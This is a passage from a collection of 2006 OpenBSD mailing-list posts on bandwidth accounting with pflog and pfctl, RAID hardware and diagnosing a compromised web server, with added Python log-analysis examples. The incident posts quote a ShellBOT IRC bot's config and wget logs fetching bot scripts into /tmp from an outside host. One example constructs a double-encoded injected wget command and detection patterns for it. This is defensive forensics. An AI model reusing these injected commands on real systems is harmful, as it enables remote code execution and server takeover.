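                      b"em0", b"", 7, 0xFFFFFFFF, 0xFFFFFFFF, 0xFFFFFFFF,
                      0xFFFFFFFF, 0xFFFFFFFF, direction)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0x4000, 64, proto, 0,
                     bytes([192, 0, 2, 10]), bytes([198, 51, 100, 7]))
    l4 = struct.pack("!HH", sport, dport)
    caplen = min(total_len, 96)          # pflog's default snaplen
    pkt = (ip + l4 + b"\0" * total_len)[:caplen]
    rec = hdr + pkt
    return struct.pack("<IIII", 0, 0, len(rec), len(hdr) + total_len) + rec


def build_capture():
    """A constructed pflog file with a handful of inbound/outbound packets."""
    global_hdr = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 160, DLT_PFLOG)
    records = [
        build_record(PF_IN, PF_PASS, 6, 1254, 25, 48),      # inbound SMTP SYN
        build_record(PF_IN, PF_PASS, 6, 4452, 80, 48),      # inbound HTTP SYN
        build_record(PF_IN, PF_PASS, 6, 4452, 80, 1500),    # inbound HTTP data, only 96 bytes captured
        build_record(PF_OUT, PF_PASS, 6, 80, 4452, 1500),   # outbound HTTP reply
        build_record(PF_IN, PF_DROP, 6, 3395, 25, 60),      # blocked SMTP attempt
        build_record(PF_OUT, PF_PASS, 17, 59258, 53, 61),   # outbound DNS query
    ]
    return global_hdr + b"".join(records)


if __name__ == "__main__":
    rows = sorted(summarize(build_capture()).items(),
                  key=lambda kv: (kv[0][0], kv[0][1], kv[0][2], kv[0][3] or 0))
    for (direction, action, proto, port), (packets, nbytes) in rows:
        print("%-4s %-5s %-4s port %-5s %6d packets %9d bytes"
              % (direction, action, proto, port, packets, nbytes))
```

Run against a real `/var/log/pflog` (`summarize(open("/var/log/pflog", "rb").read())`) the same code gives the per-service totals, provided the rules of interest carry the `log` keyword; blocked packets show up as well, which matters for the point made later in the thread that tarpitted or rejected connections still consume the link.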
Re: PFlog
On 9 Apr 2006, at 14:10, Andrew Veitch wrote:

Would pmacct help in this scenario? http://www.pmacct.org/ Not sure whether it could be configured to listen to pflog though.

The thing with pflog is that I can't see which field (if any) is the packet size, which is what I'm interested in. I'm trying to log how much of which protocol eats what amount of my bandwidth, both inbound and outbound.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: PFlog
On 9 Apr 2006, at 15:26, Stuart Henderson wrote:

The thing with pflog is that I can't see which field (if any) is the packet size, which is what I'm interested in. I'm trying to log how much of which protocol eats what amount of my bandwidth, both inbound and outbound.

Are the 'pfctl -sr -v' counters no use for you?

These look very promising indeed. I'm guessing that this:

     -s rules
             Show the currently loaded filter rules. When used together with -v, the per-rule statistics (number of evaluations, packets and bytes) are also shown. Note that the ``skip step'' optimization done automatically by the kernel will skip evaluation of rules where possible. Packets passed statefully are counted in the rule that created the state (even though the rule isn't evaluated more than once for the entire connection).

Means that all the bytes are counted, even for stateful connections? So if the first x bytes of an HTTP connection create the state, and a further Y bytes of web page are transmitted over that connection, then the total bytes field will show X+Y, rather than just X?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
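The man page text quoted above answers the X+Y question: packets matched by an existing state are charged to the rule that created it, so a "keep state" rule's Bytes counter covers the whole connection, not just the SYN. What the counters do not give you is time, because they are cumulative since the ruleset was loaded. The block below is an added example, not from the thread or from pfctl, that parses `pfctl -sr -v` output into per-rule counters, aggregates bytes per `port = N`, and differences two snapshots while tolerating a counter reset. The sample output is constructed in the layout pfctl prints (rule line, then an indented `[ Evaluations: ... ]` line); the address in the rules is the page's own server, the numbers are invented.

```python
"""Per-rule traffic counters from `pfctl -sr -v`, with snapshot differencing.

Added example, not from the original thread.  Sample output is constructed.
"""
import re

SAMPLE_T0 = """\
pass in on em0 proto tcp from any to 195.224.72.148 port = 25 flags S/SA keep state
  [ Evaluations: 4186      Packets: 31720     Bytes: 2598112    States: 3     ]
pass in on em0 proto tcp from any to 195.224.72.148 port = 80 flags S/SA keep state
  [ Evaluations: 4185      Packets: 208117    Bytes: 158940211  States: 27    ]
block drop in log on em0 all
  [ Evaluations: 9307      Packets: 1231      Bytes: 73860      States: 0     ]
"""

SAMPLE_T1 = """\
pass in on em0 proto tcp from any to 195.224.72.148 port = 25 flags S/SA keep state
  [ Evaluations: 4301      Packets: 33102     Bytes: 2701000    States: 2     ]
pass in on em0 proto tcp from any to 195.224.72.148 port = 80 flags S/SA keep state
  [ Evaluations: 4300      Packets: 210000    Bytes: 160000000  States: 30    ]
block drop in log on em0 all
  [ Evaluations: 9500      Packets: 1300      Bytes: 78000      States: 0     ]
"""

COUNTER_RE = re.compile(
    r"^\s*\[\s*Evaluations:\s*(\d+)\s+Packets:\s*(\d+)\s+Bytes:\s*(\d+)\s+States:\s*(\d+)\s*\]")
PORT_RE = re.compile(r"\bport\s*=\s*(\d+)")


def parse_rule_counters(text):
    """Return a list of dicts, one per rule, in ruleset order."""
    rules = []
    pending = None
    for line in text.splitlines():
        m = COUNTER_RE.match(line)
        if m and pending is not None:
            ev, pk, by, st = (int(x) for x in m.groups())
            rules.append({"rule": pending, "evaluations": ev, "packets": pk,
                          "bytes": by, "states": st})
            pending = None
        elif line.strip():
            pending = line.strip()          # a rule line; its counters follow
    return rules


def bytes_by_service(rules):
    """Aggregate Bytes per 'port = N' found in the rule text ('other' if none)."""
    out = {}
    for r in rules:
        m = PORT_RE.search(r["rule"])
        key = int(m.group(1)) if m else "other"
        out[key] = out.get(key, 0) + r["bytes"]
    return out


def delta(prev, cur):
    """Per-rule (packets, bytes) growth between two snapshots, keyed by rule text.

    A counter lower than before means the ruleset was reloaded (pfctl -f) or the
    box rebooted; the interval is then reported from zero, never as a negative.
    """
    prev_by_rule = {r["rule"]: r for r in prev}
    result = {}
    for r in cur:
        p = prev_by_rule.get(r["rule"])
        if p is None or r["bytes"] < p["bytes"] or r["packets"] < p["packets"]:
            result[r["rule"]] = (r["packets"], r["bytes"])
        else:
            result[r["rule"]] = (r["packets"] - p["packets"], r["bytes"] - p["bytes"])
    return result


if __name__ == "__main__":
    t0, t1 = parse_rule_counters(SAMPLE_T0), parse_rule_counters(SAMPLE_T1)
    for rule, (pk, by) in delta(t0, t1).items():
        print("%10d packets %12d bytes  %s" % (pk, by, rule))
    print(bytes_by_service(t1))
```

Feeding the output of `pfctl -sr -v` to `parse_rule_counters` from a cron job every few minutes and storing `delta()` of consecutive snapshots gives exactly the per-service bandwidth series symon/rrdtool wants; note that one rule covering several ports (a port list or range) will show up as a single counter, so the granularity of the accounting is the granularity of the ruleset.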
Re: PFlog
And the winner is: pmacct.

This one is really quick and simple to put together, five minutes and a configuration file later and I'm logging all traffic on all ports in 10 minute time slices, broken down by source, destination, MAC, port, etc. It also contains actual amounts of traffic too, so I can see how much is going in and out. It's also logging to MySQL so I can fiddle about with producing nice reports as much as I would like, probably using this tool:

http://www.maani.us/charts/index.php

I also realise that traffic that doesn't get through the firewall has still made it to my machine, and has gone over my interface, and thus I will be accountable for that traffic. If it's an SMTP connection that's tarpitted by spamd, it's still bytes that I'm accountable for.

Thanks to everybody who replied for your good suggestions,

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
LSI Raid Card
Hi,

If I got one of these:

http://www.lsilogic.com/products/megaraid/sata_150_4.html

Which is supported under the ami driver, and that I'll have four drives in RAID 5, each in these:

http://www.ebuyer.com/customer/products/index.html?action=c2hvd19wcm9kdWN0X292ZXJ2aWV3&product_uid=99222

Am I still going to be able to use the nice blink functions in bioctl? I'd like to know which drive my RAID card thinks has died...

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: LSI Raid Card
On 29 Mar 2006, at 17:46, Jon Simola wrote:

On 3/29/06, Gaby vanhegan [EMAIL PROTECTED] wrote:

Am I still going to be able to use the nice blink functions in bioctl? I'd like to know which drive my RAID card thinks has died...

You'd have to get a backplane with safte or ses that the card can talk to. The drive enclosures you linked to are dumb sleds. They do have activity lights, so you could always perform some heavy drive activity and, by a process of elimination, the one without the blinking activity light is the failed drive.

I thought that this might be the case. A backplane of some sort is totally outside my budget. I'll just have to carefully label and wire up the drives in their 'sleds' :) They do have two lights, one for power and one for drive activity. I was just wondering if the activity light could be reached by bioctl.

On 29 Mar 2006, at 18:01, Per-Olov Sjöholm wrote:

I think it should work with a command like bioctl -b channel:target.lun ami0. If its not in an enclosure it will tell... Try man bioctl

When I get my sweaty little hands on the card, I'll give that a try.

On 29 Mar 2006, at 18:03, Marco Peereboom wrote:

You show me a SATA drive that has an LED first :-)

Fair point. The caddy does claim to have a light, but if bioctl only talks to SAFTE enclosures and backplanes for this sort of thing, it's not usable for this purpose.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
DRAC vs iLo
Who wins in the OpenBSD world? DRAC (Dell Remote Admin Card) or iLo (HP's Integrated Lights Out)? We're looking at new servers and are wondering if these are worth the cash, or which is the one to go for?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Security tools
Hi,

I'm running 3.6 (yes, due for an upgrade) and I keep getting hit by some hackers that are using a bug I can't track down to download perl scripts into /tmp:

[EMAIL PROTECTED] 11:26]# cd /tmp/
[EMAIL PROTECTED] 11:26]# ls -lFa
total 76
drwxrwxrwt   2 root  wheel    512 Mar 15 12:21 ./
drwxr-xr-x  22 root  wheel    512 Jun 29  2005 ../
-rw-r--r--   1 www   wheel      0 Mar 14 22:14 .alekspwned2
-rw-r--r--   1 www   wheel      0 Mar 14 20:41 .balum
-rw-r--r--   1 www   wheel      0 Mar 13 22:36 .mladen3
-rw-r--r--   1 www   wheel    321 Mar 14 20:41 alekshah
-rw-r--r--   1 www   wheel    320 Mar 14 20:41 alekshah2
-rw-r--r--   1 www   wheel   3589 Mar 14 22:14 alekspwned
-rw-r--r--   1 www   wheel  19309 Mar 14 22:14 alekspwned2

I have lots of suspicious activity in /var/www/log/error_log:

  0 19309    0  1222    0     0   1222      0  0:00:15 --:--:--  0:00:15  1222
  0 19309    0  4142    0     0   4142      0  0:00:04  0:00:01  0:00:03  8414
100 19309  100 19309    0     0  19309      0  0:00:01  0:00:01 --:--:-- 17258
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0  3589    0  1224    0     0   1224      0  0:00:02 --:--:--  0:00:02  1224
100  3589  100  3589    0     0   3589      0  0:00:01 --:--:--  0:00:01 2309k
Can't open perl script /tmp/.alekspwned: No such file or directory.
Use -S to search $PATH for it.
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0  3589    0  1224    0     0   1224      0  0:00:02 --:--:--  0:00:02  1224
100  3589  100  3589    0     0   3589      0  0:00:01 --:--:--  0:00:01  384k
Can't open perl script /tmp/.alekspwned: No such file or directory.
Use -S to search $PATH for it.
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0  3589    0  1224    0     0   1224      0  0:00:02 --:--:--  0:00:02  1224
100  3589  100  3589    0     0   3589      0  0:00:01 --:--:--  0:00:01  461k

Amongst other things, quite a few:

Can't open perl script /tmp/.mladen: No such file or directory. Use -S to search $PATH for it.
Can't open perl script /tmp/.mladen: No such file or directory. Use -S to search $PATH for it.
Can't open perl script /tmp/.mladen: No such file or directory. Use -S to search $PATH for it.
Can't open perl script /tmp/.mladen: No such file or directory. Use -S to search $PATH for it.
Can't open perl script /tmp/.mladen2: No such file or directory. Use -S to search $PATH for it.
Can't open perl script /tmp/.mladen2: No such file or directory. Use -S to search $PATH for it.
Can't open perl script /tmp/.mladen2: No such file or directory. Use -S to search $PATH for it.
Can't open perl script /tmp/.mladen2: No such file or directory. Use -S to search $PATH for it.
Can't open perl script /tmp/.mladen2: No such file or directory. Use -S to search $PATH for it.

I believe they're exploiting a bug in apache to do remote execution of their code, which downloads something to /tmp (usually a script of some sort). They were previously using wget, so I modified that to log as much information as it could to a file, but this didn't yield anything useful. Now I see from the logs that they're using ftp and curl to download the files. As an intermediate fix, I have mounted /tmp noexec, but this is not an ideal solution, and I don't want to remove ftp and curl.

I have installed snort (from ports) with the latest rules but this has not yielded much useful information. The latest attack did come up in the snort logs, as a double decoding attack. I found some data in the downloaded files that corresponded to a payload around the time of the attack.

My questions are:

1. How do I find out their attack vector? I have had a nessus scan performed on the machine, but it did not present any security (I can supply on request). I've checked the security releases in security.html and there are no pertinent ones for httpd. Snort has provided little useful information (I can provide access to the snort logs if required).

2. If I can't stop them getting in, is there any way to observe what they're doing, or how they're doing it, so I can get a pointer to the hole.

An upgrade is in the works, and right soon too, but I'd really like to know what's going on here. Some useful links:

Nessus scan: http://vanhegan.net/openbsd/nessus.txt
dmesg: http://vanhegan.net/openbsd/dmesg.txt
httpd error_log: http://vanhegan.net/openbsd/error_log
httpd access_log: http://vanhegan.net/openbsd/access_log
pkg_info: http://vanhegan.net/openbsd/pkg.list

I've run out of ideas here. Can you help?

Gaby
--
Junkets for
Re: php in cgi mode suphp missing(?) from packages
On 15 Mar 2006, at 21:39, Anon wrote:

As OBSD is focused on security, it makes a lot of sense to me that OBSD would at least include the CGI version of PHP in its php-core packages, and preferably have a suphp package too.

Ports are provided by the community, not by OpenBSD. OpenBSD provides a great framework for creating ports, but does not create the actual ports. If you want a port, join the ports mailing list on ports@openbsd.org

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
New dell server
Hi,

I'm considering getting a Dell PowerEdge SC1420 SATA. We need a small, cheap server for hosting some websites and email. A dual PIII-733 generic server isn't cutting the mustard any more so it looks like it's time to spend money. Has anybody managed to get the CERC SATA raid controller running on 3.8 or 3.9-stable? Alternatively, where's the cheapest source of LSI SATA cards? Can I boot from a system installed on an LSI card?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: New dell server
On 14 Feb 2006, at 20:18, Brandon Mercer wrote:

Has anybody managed to get the CERC SATA raid controller running on 3.8 or 3.9-stable? Alternatively, where's the cheapest source of LSI SATA cards? Can I boot from a system installed on an LSI card?

LSI cards, as has been talked to death in the archives, are GREAT cards, of course the work and boot properly. :-) Also, newegg usually has them at a good price.

Brandon

Unfortunately:

http://www.newegg.com/Product/CustratingReview.asp?item=N82E16816118007

Looks like we'll be spending a bit more cash on this:

http://www.newegg.com/Product/CustratingReview.asp?item=N82E16816118015

I'm intrigued by the comment:

Although it will function in a PCI slot, the throughput is marginal even with 4 x 36 gig raptors in RAID 0. I was expecting at least 150 mbps transfer rates and I'm only getting 80. Technical support was knowledgeable and I didn't have to wait more than 5 minutes to talk to someone. They informed me that this card performs best in a 64 bit/100 mhz slot such as a server board. IMHO its price is not justified vs the performance in a 32 bit system

The application we have for the server does not require heavy data-throughput, so this bottleneck wouldn't be too much of a problem, but if I can spend a few more quid on a different mobo to get double the speed, I'd like to. What am I looking for here, motherboards that will take a 64 bit CPU and have 100Mhz PCI slots? That's a PCI-X card, no?

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: Remove all password restrictions?
On 10 Jan 2006, at 07:12, Peter Bako wrote:

How do I change this so I can use any generic password? While for this case I want to dumb down the rules, for other more exposed servers I would like to do the opposite so I really would like to know how/where to modify this.

Although it complains about short/bad passwords, keep putting it in, it'll relent after the third or fourth attempt.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
FreeBSD packages
Hi,

I have a FreeBSD package that contains the networker backup software. I've made the software run on OpenBSD by installing the FreeBSD compat stuff. What I want to know is if there's a cleaner way to install the package, or if there's a way to convert a package to the OpenBSD package format. I've made packages before, so I think I can convert it to an OpenBSD package if needs be. If there's any hints or tips about converting Free to OpenBSD packages, I'd be happy to listen.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: FreeBSD packages
On 10 Jan 2006, at 17:36, Jasper Lievisse Adriaanse wrote:

Well, it would be easier to just convert the port to an OpenBSD port, and then build the package on OpenBSD directly.

This is what I'm thinking. It is a bunch of binaries that sit in a separate subfolder in /usr/local, some man pages and a bit of code to go into /etc/rc.local. No problems.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
How did they get here?
To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386.

I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are:

### Microsoft Search Worm - by br0k3d ###
# From the same author of LinuxDay Worm and other variants ###

And:

# ShellBOT
# 0ldW0lf - [EMAIL PROTECTED]
# - www.atrix-br.cjb.net
# - www.atrix.cjb.net

in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DOS, and the likes. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is:

# IRC
my @adms=(darkwoot, br0k3d, vipzen, Nandokabala); # administrators' nicks
my @canais=(#gestapo);
my $nick='ADOLFHITLER'; # bot's nick.. if the nick is already in use.. it will appear with a random number at the end
my $ircname = 'SSSA';
chop (my $realname = `uname -a`);
$servidor='irc.agitamanaus.net' unless $servidor; # irc server that will be used if none is specified in the argument
my $porta='6667'; # irc server port

My question is how did these files get into the machine. I have entries in the httpd error log that look like this:

--05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
           => `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
HTTP request sent, awaiting response...
--05:10:57--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
           => `/tmp/.cpanel.tmp'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out.
Retrying.
--05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2)
           => `/tmp/.cpanel.tmp'
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
Length: 3,355 [text/plain]
    0K ... 100%  468.05 KB/s
05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]

So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk). Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site. I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem.

As far as I can tell, there is no damage, but there are some entries like these in the error logs:

/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found
/tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected

Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :)

So, what's my next move? My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list. I would provide a dmesg but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file.

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
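Both this post and the later "Security tools" one face the same gap: the wget/curl output in error_log shows that something fetched a file into /tmp, but not which request did it. The `--05:10:47--` lines do give a time of day, so the practical hunt is to take every access_log request within a window of those times, decode its path and parameters repeatedly (Snort's "double decoding" alert in the other post means a single pass is not enough), and flag the ones whose decoded parameters mention a download tool, shell metacharacters, a remote URL or a /tmp path. The block below is an added example serving both posts; it is not code from either thread. All log lines in it are constructed, the addresses are documentation ranges rather than hosts from the posts, and the function names are this example's own.

```python
"""Hunt the web access log for the request that triggered a /tmp download.

Added example.  Correlates access_log requests with the times printed by
wget in error_log, decodes each request fully, and flags injection markers.
"""
import re
from datetime import datetime
from urllib.parse import parse_qsl, unquote

CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')
FETCH_TOOLS = re.compile(r"\b(?:wget|curl|ftp|fetch|lynx)\b")
SHELL_META = re.compile(r"[;|`&]|\$\(")
REMOTE_URL = re.compile(r"(?:https?|ftp)://", re.IGNORECASE)
TMP_PATH = re.compile(r"/(?:tmp|var/tmp)/")

# Constructed access_log lines in Common Log Format (not real traffic).
SAMPLE_ACCESS_LOG = """\
203.0.113.8 - - [04/Jan/2006:05:05:00 +0000] "POST /contact.php HTTP/1.1" 200 1822
198.51.100.9 - - [04/Jan/2006:05:10:46 +0000] "GET /shop/list.php?page=%2526wget%2520http%253A%252F%252F198.51.100.7%252Fbot.txt%2520-O%2520%252Ftmp%252F.cpanel%2526 HTTP/1.0" 200 311
203.0.113.21 - - [04/Jan/2006:05:11:30 +0000] "GET /news.php?id=3&lang=en HTTP/1.1" 200 5123
203.0.113.21 - - [04/Jan/2006:05:30:00 +0000] "GET /news.php?id=4 HTTP/1.1" 200 5211
"""


def decode_fully(value, max_rounds=4):
    """Percent-decode until the string stops changing; return (text, extra rounds)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(value)
        if nxt == value:
            break
        value, rounds = nxt, rounds + 1
    return value, rounds


def analyze_target(target):
    """Decode a request target; return (flags, decoded path, decoded params)."""
    path, _, query = target.partition("?")
    flags = set()
    # One decode is normal for any URL; anything beyond that is double encoding.
    dec_path, extra_rounds = decode_fully(unquote(path))
    params = []
    # Split on the raw '&' first, so separators hidden behind double encoding
    # end up inside a value (suspicious) instead of between values (normal).
    for name, value in parse_qsl(query, keep_blank_values=True):
        dec_value, rounds = decode_fully(value)
        extra_rounds = max(extra_rounds, rounds)
        params.append((name, dec_value))
    for text in [dec_path] + [v for _, v in params]:
        if FETCH_TOOLS.search(text):
            flags.add("fetch-tool")
        if SHELL_META.search(text):
            flags.add("shell-metachar")
        if REMOTE_URL.search(text):
            flags.add("remote-url")
        if TMP_PATH.search(text):
            flags.add("tmp-path")
    if extra_rounds >= 1:
        flags.add("multi-decode")
    return flags, dec_path, params


def _seconds_of_day(hhmmss):
    h, m, s = (int(x) for x in hhmmss.split(":"))
    return h * 3600 + m * 60 + s


def hunt(log_text, anchor_times=None, window=120):
    """Return parsed requests within `window` seconds of any anchor ("HH:MM:SS")."""
    anchors = [_seconds_of_day(t) for t in (anchor_times or [])]
    hits = []
    for line in log_text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        client, stamp, method, target, status, _size = m.groups()
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        tod = when.hour * 3600 + when.minute * 60 + when.second
        if anchors and not any(abs(tod - a) <= window for a in anchors):
            continue
        flags, path, params = analyze_target(target)
        hits.append({"client": client, "time": stamp, "method": method, "status": status,
                     "path": path, "params": params, "flags": flags})
    return hits


if __name__ == "__main__":
    # Anchor times taken from the wget lines quoted in the post.
    for hit in hunt(SAMPLE_ACCESS_LOG, ["05:10:47", "05:12:13"]):
        marker = "!!" if hit["flags"] else "  "
        print(marker, hit["time"], hit["client"], hit["method"], hit["path"],
              hit["params"], sorted(hit["flags"]))
```

Run over the real logs, `hunt(open(path).read(), ["05:10:47", "05:12:13"])` for each site's access_log does the bulk grep the post describes, but on decoded parameters rather than on the literal string `wget`, which is exactly what single-pass grep misses when the payload is double encoded. Requests that fall in the window and carry no flags are still worth a look, since a POST body is not in the access log at all.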
Re: How did they get here?
On 4 Jan 2006, at 15:51, Pete Vickers wrote:

> Standard advice is to reinstall the o/s (3.8 ? ;-) and then _data_ only from known good backup. You could use a boot cdrom dd off an image of the disk for later analysis if you want first.

It seems that the files have been uploaded, but they haven't actually caused any damage, or even been run. Unfortunately, I don't have the resources to mount a full investigation. Grep'ing every httpd log on the machine has produced no more information, but the fact that the actual wget output was in the httpd logs leads me to think that was the way in.

> Is there some attack vector like php or such available on the machine ? maybe they used that to retrieve write the file?

The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success.

> ... but access to /tmp is tricky from a chrooted httpd !

Legacy sites mean that we haven't tried to chroot apache yet. I think it's probably time to bite the bullet and get this done :)

Gaby
--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Jan 2006, at 16:05, eric wrote:

>> I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are:
>
> Is this doing any A/V scanning? You have told us nothing about the host in question: is it an email gateway? DNS server? etc.

It runs:

- qmail/spamassassin-spamd/openbsd-spamd/rblsmtpd
- stock apache/php 4.3.8

It does no AV scanning above and beyond what SpamAssassin provides. It does not run any DNS services. I outlined my reasons why I thought it was a php/cgi script problem, being that the messages were found in the default httpd error logs.

Finally, here is a dmesg (thanks Josh :-)

OpenBSD 3.6 (GENERIC.MP) #173: Fri Sep 17 12:52:31 MDT 2004
    [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP
cpu0: Intel Pentium III (GenuineIntel 686-class) 601 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR,SSE
real mem = 1073324032 (1048168K)
avail mem = 972726272 (949928K)
using 4278 buffers containing 53768192 bytes (52508K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 07/15/99, BIOS32 rev. 0 @ 0xfdb50
apm0 at bios0: Power Management spec V1.2
apm0: AC on, battery charge unknown
pcibios0 at bios0: rev 2.1 @ 0xf/0x1
pcibios0: PCI BIOS has 8 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:07:0 (Intel 82371AB PIIX4 ISA rev 0x00)
pcibios0: PCI bus #1 is the last bus
bios0: ROM list: 0xc/0x8000
mainbus0: Intel MP Specification (Version 1.1) (INTEL440GX )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: apic clock running at 100 MHz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel Pentium III (GenuineIntel 686-class) 601 MHz
cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,SER,MMX,FXSR,SSE
mainbus0: bus 0 is type PCI
mainbus0: bus 1 is type PCI
mainbus0: bus 2 is type ISA
ioapic0 at mainbus0: apid 2 pa 0xfec0, version 11, 24 pins
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 Intel 82443BX AGP rev 0x03
ppb0 at pci0 dev 1 function 0 Intel 82443BX AGP rev 0x03
pci1 at ppb0 bus 1
pcib0 at pci0 dev 7 function 0 Intel 82371AB PIIX4 ISA rev 0x02
pciide0 at pci0 dev 7 function 1 Intel 82371AB IDE rev 0x01: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: ST380011A
wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors
wd1 at pciide0 channel 0 drive 1: IBM-DPTA-372050
wd1: 16-sector PIO, LBA, 19574MB, 40088160 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
wd1(pciide0:0:1): using PIO mode 4, Ultra-DMA mode 2
pciide0: channel 1 disabled (no drives)
uhci0 at pci0 dev 7 function 2 Intel 82371AB USB rev 0x01: apic 2 int 19 (irq 11)
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, class 9/0, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
Intel 82371AB Power Mgmt rev 0x02 at pci0 dev 7 function 3 not configured
vga1 at pci0 dev 17 function 0 ATI Mach64 GP rev 0x5c
wsdisplay0 at vga1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
xl0 at pci0 dev 18 function 0 3Com 3c905B 100Base-TX rev 0x30: apic 2 int 18 (irq 9), address 00:50:04:6a:2f:19
exphy0 at xl0 phy 24: 3Com internal media interface
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pcppi0 at isa0 port 0x61
midi0 at pcppi0: PC speaker
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
lm0 at isa0 port 0x290/8: LM79
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask 0 netmask 0 ttymask 0
pctr: 686-class user-level performance counters enabled
mtrr: Pentium Pro MTRR support
dkcsum: wd0 matched BIOS disk 80
